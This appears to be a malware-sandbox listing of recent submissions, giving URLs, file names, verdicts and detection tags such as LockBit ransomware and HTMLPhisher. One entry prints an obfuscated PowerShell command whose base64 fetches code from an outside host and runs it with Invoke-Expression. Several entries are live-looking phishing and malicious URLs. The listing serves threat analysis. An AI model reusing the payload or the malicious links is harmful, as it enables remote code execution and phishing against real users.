top title background image
Malware  Trends
flash

Detection Sample Info Download Report Classification & Info Graph
Clean
https://absagax-my.sharepoint.com/:o:/g/personal/hugo_orrenius_sagax_se/EuTBsoRymPNEoRryyhvdZFgBE_bjdGX-eADSJ-uWeTPJPg?e=F1eid3
2024-05-14 10:40:08 +02:00
No classification & info
no
Graph
Malicious
  • Snort
http://omnatuor.com
2024-05-14 10:39:02 +02:00
Info
Clean
Midlandcomputers SWIFT COPY _ Saturday May 2024..rtf
2024-05-14 10:38:52 +02:00
No classification & info
no
Graph
Clean
https://absagax-my.sharepoint.com/:o:/g/personal/hugo_orrenius_sagax_se/EuTBsoRymPNEoRryyhvdZFgBE_bjdGX-eADSJ-uWeTPJPg?e=F1eid3
2024-05-14 10:38:32 +02:00
No classification & info
no
Graph
Clean
https://dhlde.center/xf2WeN
2024-05-14 10:37:52 +02:00
No classification & info
no
Graph
Malicious
  • Sigma
AV: None
no Icon
ipconfig /flushdns $Microsoft = ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("JGc5MUYgPSAnaHR0cHM6Ly9ydGF0dGFjay5iYXFlYmVpMS5vbmxpbmUvS0IvQ09ERCcKJHYzOEsgPSBAeyAnVXNlci1BZ2VudCcgPSAnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEwMi4wLjAuMCBTYWZhcmkvNTM3LjM2JyB9CiR6MDRRID0gSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkZzkxRiAtVXNlQmFzaWNQYXJzaW5nIC1IZWFkZXJzICR2MzhLCgpJRVggKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR6MDRRLkNvbnRlbnQpKQoKY2xlYXItaG9zdDs="))); $DUMP = ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw=="))); $VER = $Microsoft + "; " + $DUMP; Invoke-Expression $VER; exit;
2024-05-14 10:37:37 +02:00
Info
Malicious
http://cohawaut.com
2024-05-14 10:37:07 +02:00
Info
Malicious
https://147.45.47.87
2024-05-14 10:33:36 +02:00
Info
Suspicious
https://www.docusign.com/features-and-benefits/mobile?utm_campaign=GBL_XX_DBU_UPS_2211_SignNotificationEmailFooter&utm_medium=product&utm_source=postsend
2024-05-14 10:27:24 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
LockBit ransomware
AV: None
Document.zip
2024-05-14 10:25:08 +02:00
Info
Class
Clean
http://picomes-us.com
2024-05-14 10:15:33 +02:00
Info
Clean
https://github.com/Nuand/bladeRF/blob/master/COPYING%200.0.0.0
2024-05-14 10:12:38 +02:00
Info
Clean
https://apps.powerapps.com/play/e/91dbed60-a6da-ebfe-bb1c-841b66e15e5c/a/a7356933-a835-46f2-a533-7bf9b37a965e?tenantId=09bd70d8-f5ec-49d0-bd32-19f9e607c56d&ID=4578
2024-05-14 10:11:16 +02:00
Info
Clean
http://top-precisionus.com
2024-05-14 10:10:43 +02:00
Info
Suspicious
njcomhk350sw20518.exe
2024-05-14 10:10:27 +02:00
Info
Class
Malicious
http://mail.lk-tech.com/webmail/?_task=mail&_action=get&_mbox=INBOX&_uid=10784&_token=3XGMxnBDdVVCXwM3UEjeEHvnc1YxFdfc&_part=13&_embed=1&_mimeclass=image
2024-05-14 09:58:11 +02:00
Info
Class
Malicious
https://www.google.com/url?q=https://sheathered-cell-4436.pages.dev/?cis%3Djoaasulsq%26psa%3D%5B%5B-Email-%5D%5D&source=gmail&ust=1713939747112000&usg=AOvVaw3_RwA1hNR3bLZQBSG5MJ7e
2024-05-14 09:58:11 +02:00
Info
Malicious
AV: None
https://purple-share-9798.pages.dev/?czo=eljffnpsueush&psa=info@falconincorporation.com
2024-05-14 09:58:11 +02:00
Info
Class
Malicious
AV: 64%
ThoBG5R3ER.exe
2024-05-14 09:54:45 +02:00
No classification & info
Malicious
  • Yara
HTMLPhisher
AV: 3%
https://app.adjust.com/97grly?odndlabel=2ch_002&redirect=//%2564%2537%2561%2578%2574%2574%256d%256e%256d%2568%2531%2572%2538%252e%2563%256c%256f%2575%2564%2566%2572%256f%256e%2574%252e%256e%2565%2574?blm=redoxone.com
2024-05-14 09:54:45 +02:00
Info
Class
Windows: InjectsWrites Registry keysDrops PE FilesHas more than one ProcessHas Email attachmentDisassembly is available
Android: Receives SMS Sends SMS Reboot Native CMD
Common: Generates Internet Traffic Generates HTTP Network Traffic Expired Sample Creates malicious files Contains malware configuration(s)
Customization Show ID column